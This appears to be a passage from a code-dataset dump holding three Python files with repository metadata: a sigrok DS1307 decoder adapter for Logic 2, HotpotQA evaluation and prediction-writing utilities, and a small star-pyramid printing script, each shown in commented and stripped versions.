                settings[option["desc"]]['choices'] = option["values"]
        return {
            'settings': settings
        }

    def set_settings(self, settings):
        # TODO handle the settings
        # Convert sigrok's annotation tuples, e.g.
        #   annotations = (('warning', 'Warning'), ...)
        # into Logic 2's result_types mapping.
        self.sigrokDecoder.reset()
        resultTypes = {}
        for annotation in self.sigrokDecoder.annotations:
            resultTypes[annotation[0]] = annotation[1] + "{{data.data}}"
        return {
            "result_types": resultTypes
        }

    def decode(self, data):
        """Feed one I2C frame to the decoder; emit a result when a packet
        has been assembled (returns None otherwise)."""
        self.sigrokDecoder.processI2C(data)
        # NOTE(review): generate_logic_result is not defined on this class or
        # visible in this file -- confirm it exists before relying on it.
        if not self.packet == {}:
            ret = self.generate_logic_result()
            self.packet = {}
            return ret
| 29.421053
| 137
| 0.57901
|
import sys
sys.path.insert(0, "../")
from pd import Decoder
class DS1307():
    """Adapter exposing the sigrok DS1307 decoder to the Logic 2 HLA API."""

    def __init__(self):
        self.sigrokDecoder = Decoder()

    def get_capabilities(self):
        """Translate the sigrok decoder's options into Logic 2 settings."""
        settings = {}
        for option in self.sigrokDecoder.options :
            settingType = ''
            choices = []
            if ("values" not in option) :
                # Infer the setting type from the Python type of the default.
                if (isinstance(option['default'], str)) :
                    settingType = 'string'
                elif (isinstance(option['default'], int) or isinstance(option['default'], float)) :
                    settingType = 'number'
                else :
                    print("Cannot determine the type of the " + option['desc'] + " parameter from it's default value: " + option['default'])
            settings[option["desc"]] = {
                'type': settingType
            }
            if ("values" in option) :
                settings[option["desc"]]['choices'] = option["values"]
        return {
            'settings': settings
        }

    def set_settings(self, settings):
        # TODO handle the settings
        # Convert sigrok's annotation tuples into Logic 2's result_types map.
        self.sigrokDecoder.reset()
        resultTypes = {}
        for annotation in self.sigrokDecoder.annotations :
            resultTypes[annotation[0]] = annotation[1] + "{{data.data}}"
        return {
            "result_types": resultTypes
        }

    def decode(self, data):
        """Feed one I2C frame to the decoder and emit a result when a packet
        is complete.

        NOTE(review): self.packet is never initialized in __init__ and
        generate_logic_result is not defined in this file -- the first call
        will raise AttributeError; confirm against the full project.
        """
        self.sigrokDecoder.processI2C(data)
        if (not self.packet == {}) :
            ret = self.generate_logic_result()
            self.packet = {}
            return ret
| true
| true
|
f705e56a5a72c63a6b880ab3f1397c0082a8229a
| 4,774
|
py
|
Python
|
hotpotqa_utils_joint.py
|
Captainr22/SAE
|
f3e370604978a273eb1e1ffdbd342dee3de431c9
|
[
"MIT"
] | 38
|
2020-01-23T00:46:06.000Z
|
2022-03-13T13:10:19.000Z
|
hotpotqa_utils_joint.py
|
Captainr22/SAE
|
f3e370604978a273eb1e1ffdbd342dee3de431c9
|
[
"MIT"
] | 7
|
2020-02-02T02:05:32.000Z
|
2022-03-06T04:37:06.000Z
|
hotpotqa_utils_joint.py
|
Captainr22/SAE
|
f3e370604978a273eb1e1ffdbd342dee3de431c9
|
[
"MIT"
] | 9
|
2020-02-12T08:35:23.000Z
|
2022-02-19T07:29:26.000Z
|
import torch
import numpy as np
import json, sys, re, string
import collections
from collections import Counter
from collections import OrderedDict
def get_sp_pred(pred_sp_idx, data):
    """get the prediction of supporting facts in original format
    Arguments:
        pred_sp_idx {[type]} -- [description]
        data {[type]} -- [description]
    """
    # Keep only in-range indices and map each to its [doc title, sent id] pair.
    return [[data[p].doc_title[0], data[p].sent_id]
            for p in pred_sp_idx if p < len(data)]
def process_logit(batch_index, batch_logits, predict_features, predict_examples, max_answer_length):
    """get predictions for each sample in the batch
    Arguments:
        batch_index {[type]} -- [description]
        batch_logits {[type]} -- 0: supporting facts logits, 1: answer type logits
            (NOTE(review): an earlier layout listed span/gold-doc logits too,
            but only indices 0 and 1 are read here)
        batch_size {[type]} -- [description]
        predict_file {[type]} -- [description]
    """
    # Sigmoid turns supporting-fact logits into per-sentence probabilities.
    sp_logits_np = torch.sigmoid(batch_logits[0]).detach().cpu().numpy()
    ans_type_logits_np = batch_logits[1].detach().cpu().numpy()
    batch_index = batch_index.numpy().tolist()
    sp_pred, span_pred, ans_type_pred = [], [], []
    for idx, data in enumerate(batch_index):
        # supporting facts prediction: keep sentences with probability > 0.5
        pred_sp_idx = [ x[0] for x in enumerate(sp_logits_np[idx,:].tolist()) if x[1] > 0.5 ]
        # NOTE(review): leftover debug print -- consider removing or logging.
        print(pred_sp_idx)
        if len(pred_sp_idx) != 0:
            sp_pred.append(get_sp_pred(pred_sp_idx, predict_examples[data]))
        else:
            sp_pred.append([])
        # answer type prediction, for debug purpose
        ans_type_pred.append(np.argmax(ans_type_logits_np[idx,:]))
        # answer span prediction: type 0 -> "no", 1 -> "yes", otherwise a
        # span to be filled in elsewhere (empty placeholder here)
        if ans_type_pred[-1] == 0:
            span_pred.append("no")
        elif ans_type_pred[-1] == 1:
            span_pred.append("yes")
        else:
            span_pred.append("")
    return sp_pred, span_pred, ans_type_pred
# def evaluate(eval_file, answer_dict):
# f1 = exact_match = total = 0
# for key, value in enumerate(answer_dict):
# total += 1
# ground_truths = eval_file[key]["answer"]
# prediction = value
# cur_EM = exact_match_score(prediction, ground_truths)
# cur_f1, _, _ = f1_score(prediction, ground_truths)
# exact_match += cur_EM
# f1 += cur_f1
# exact_match = 100.0 * exact_match / total
# f1 = 100.0 * f1 / total
# return {'exact_match': exact_match, 'f1': f1}
def normalize_answer(s):
    """Normalize an answer string: lower-case it, strip punctuation, drop
    the articles a/an/the and collapse whitespace runs to single spaces."""
    text = s.lower()
    punct = set(string.punctuation)
    text = ''.join(ch for ch in text if ch not in punct)
    text = re.sub(r'\b(a|an|the)\b', ' ', text)
    return ' '.join(text.split())
def f1_score(prediction, ground_truth):
    """Token-level F1 between prediction and ground truth.

    Returns (f1, precision, recall).  yes/no/noanswer answers only count
    when they match exactly; any mismatch involving them scores zero.
    """
    pred_norm = normalize_answer(prediction)
    gold_norm = normalize_answer(ground_truth)
    ZERO_METRIC = (0, 0, 0)
    special = ('yes', 'no', 'noanswer')
    if pred_norm != gold_norm and (pred_norm in special or gold_norm in special):
        return ZERO_METRIC
    pred_tokens = pred_norm.split()
    gold_tokens = gold_norm.split()
    # Multiset intersection counts each shared token at most min(freqs) times.
    overlap = sum((Counter(pred_tokens) & Counter(gold_tokens)).values())
    if overlap == 0:
        return ZERO_METRIC
    precision = 1.0 * overlap / len(pred_tokens)
    recall = 1.0 * overlap / len(gold_tokens)
    f1 = (2 * precision * recall) / (precision + recall)
    return f1, precision, recall
def exact_match_score(prediction, ground_truth):
    """True when prediction equals ground truth after normalization."""
    return normalize_answer(prediction) == normalize_answer(ground_truth)
def write_prediction(sp_preds, answer_preds, orig_data, predict_file, output_dir):
    """write predictions to json file
    Arguments:
        sp_preds {[type]} -- [description]
        answer_preds {[type]} -- [description]
        orig_data {[type]} -- [description]
        predict_file {[type]} -- [description]
        output_dir {[type]} -- [description]
    """
    # With no answer predictions, pad with placeholders so every id gets one.
    if not answer_preds:
        answer_preds = ["place_holder"] * len(orig_data)
    answers = OrderedDict()
    sps = OrderedDict()
    for idx, data in enumerate(orig_data):
        answers[data['_id']] = answer_preds[idx]
        sps[data['_id']] = sp_preds[idx]
    all_pred = {'answer': answers, 'sp': sps}
    with open(output_dir, 'w') as fid:
        json.dump(all_pred, fid)
| 32.47619
| 124
| 0.646418
|
import torch
import numpy as np
import json, sys, re, string
import collections
from collections import Counter
from collections import OrderedDict
def get_sp_pred(pred_sp_idx, data):
    """Map predicted supporting-fact indices back to the original HotpotQA
    format, a list of [doc_title, sent_id] pairs; out-of-range indices are
    silently skipped."""
    pred = []
    for p in pred_sp_idx:
        if p < len(data):
            pred.append([data[p].doc_title[0], data[p].sent_id])
    return pred
def process_logit(batch_index, batch_logits, predict_features, predict_examples, max_answer_length):
    """Turn a batch of model logits into supporting-fact, span-placeholder
    and answer-type predictions.

    batch_logits[0] holds supporting-fact logits, batch_logits[1] holds
    answer-type logits; only these two entries are read here.
    """
    # Sigmoid turns supporting-fact logits into per-sentence probabilities.
    sp_logits_np = torch.sigmoid(batch_logits[0]).detach().cpu().numpy()
    ans_type_logits_np = batch_logits[1].detach().cpu().numpy()
    batch_index = batch_index.numpy().tolist()
    sp_pred, span_pred, ans_type_pred = [], [], []
    for idx, data in enumerate(batch_index):
        # Keep sentence indices whose predicted probability exceeds 0.5.
        pred_sp_idx = [ x[0] for x in enumerate(sp_logits_np[idx,:].tolist()) if x[1] > 0.5 ]
        # NOTE(review): leftover debug print -- consider removing or logging.
        print(pred_sp_idx)
        if len(pred_sp_idx) != 0:
            sp_pred.append(get_sp_pred(pred_sp_idx, predict_examples[data]))
        else:
            sp_pred.append([])
        ans_type_pred.append(np.argmax(ans_type_logits_np[idx,:]))
        # Answer type 0 -> "no", 1 -> "yes"; otherwise an empty placeholder
        # for a span filled in elsewhere.
        if ans_type_pred[-1] == 0:
            span_pred.append("no")
        elif ans_type_pred[-1] == 1:
            span_pred.append("yes")
        else:
            span_pred.append("")
    return sp_pred, span_pred, ans_type_pred
def normalize_answer(s):
    """Normalize an answer string: lower-case it, strip punctuation, drop
    the articles a/an/the and collapse whitespace runs (SQuAD-style)."""
    def remove_articles(text):
        return re.sub(r'\b(a|an|the)\b', ' ', text)
    def white_space_fix(text):
        return ' '.join(text.split())
    def remove_punc(text):
        exclude = set(string.punctuation)
        return ''.join(ch for ch in text if ch not in exclude)
    def lower(text):
        return text.lower()
    # Applied inside-out: lower -> strip punctuation -> drop articles -> fix ws.
    return white_space_fix(remove_articles(remove_punc(lower(s))))
def f1_score(prediction, ground_truth):
    """Token-level F1 between prediction and ground truth; returns
    (f1, precision, recall).  yes/no/noanswer answers must match exactly,
    otherwise the score is zero."""
    normalized_prediction = normalize_answer(prediction)
    normalized_ground_truth = normalize_answer(ground_truth)
    ZERO_METRIC = (0, 0, 0)
    if normalized_prediction in ['yes', 'no', 'noanswer'] and normalized_prediction != normalized_ground_truth:
        return ZERO_METRIC
    if normalized_ground_truth in ['yes', 'no', 'noanswer'] and normalized_prediction != normalized_ground_truth:
        return ZERO_METRIC
    prediction_tokens = normalized_prediction.split()
    ground_truth_tokens = normalized_ground_truth.split()
    # Multiset intersection counts each shared token at most min(freqs) times.
    common = Counter(prediction_tokens) & Counter(ground_truth_tokens)
    num_same = sum(common.values())
    if num_same == 0:
        return ZERO_METRIC
    precision = 1.0 * num_same / len(prediction_tokens)
    recall = 1.0 * num_same / len(ground_truth_tokens)
    f1 = (2 * precision * recall) / (precision + recall)
    return f1, precision, recall
def exact_match_score(prediction, ground_truth):
    """True when prediction equals ground truth after normalization."""
    return (normalize_answer(prediction) == normalize_answer(ground_truth))
def write_prediction(sp_preds, answer_preds, orig_data, predict_file, output_dir):
    """Write answer and supporting-fact predictions, keyed by example _id,
    to a JSON file at output_dir.  (predict_file is accepted but unused.)"""
    # With no answer predictions, pad with placeholders so every id gets one.
    if len(answer_preds) == 0:
        answer_preds = ["place_holder"] * len(orig_data)
    all_pred = {}
    all_pred['answer'] = OrderedDict()
    all_pred['sp'] = OrderedDict()
    for idx, data in enumerate(orig_data):
        all_pred['answer'][data['_id']] = answer_preds[idx]
        all_pred['sp'][data['_id']] = sp_preds[idx]
    with open(output_dir, 'w') as fid:
        json.dump(all_pred, fid)
| true
| true
|
f705e584e7382dd36ff080ed8c2d1c45f243aa82
| 255
|
py
|
Python
|
task/learn-python/pyramid.py
|
jiangdapeng/netease
|
032c8f7c60b8afb98bf9674cf3617f614c200a92
|
[
"MIT"
] | null | null | null |
task/learn-python/pyramid.py
|
jiangdapeng/netease
|
032c8f7c60b8afb98bf9674cf3617f614c200a92
|
[
"MIT"
] | null | null | null |
task/learn-python/pyramid.py
|
jiangdapeng/netease
|
032c8f7c60b8afb98bf9674cf3617f614c200a92
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
#-*-coding=utf-8-*-
def pyramid(n):
    """Print an n-row star pyramid centered in a 2*n-1 wide field."""
    # The unused 'most' variable (2*n - 1) was removed.
    for i in range(1, n + 1):
        stars = 2 * i - 1      # odd number of stars per row
        padding = n - i        # left padding centers the row
        print(" " * padding + "*" * stars)
def test():
    """Smoke-test pyramid() at a few sizes."""
    for size in (3, 4, 5):
        pyramid(size)
if __name__ == "__main__":
    # Run the demo only when executed as a script.
    test()
| 14.166667
| 31
| 0.529412
|
def pyramid(n):
    """Print an n-row star pyramid centered in a 2*n-1 wide field."""
    # The unused 'most' variable (2*n - 1) was removed.
    for i in range(1, n + 1):
        stars = 2 * i - 1      # odd number of stars per row
        padding = n - i        # left padding centers the row
        print(" " * padding + "*" * stars)
def test():
    """Smoke-test pyramid() at a few sizes."""
    for size in (3, 4, 5):
        pyramid(size)
if __name__ == "__main__":
    # Run the demo only when executed as a script.
    test()
| true
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.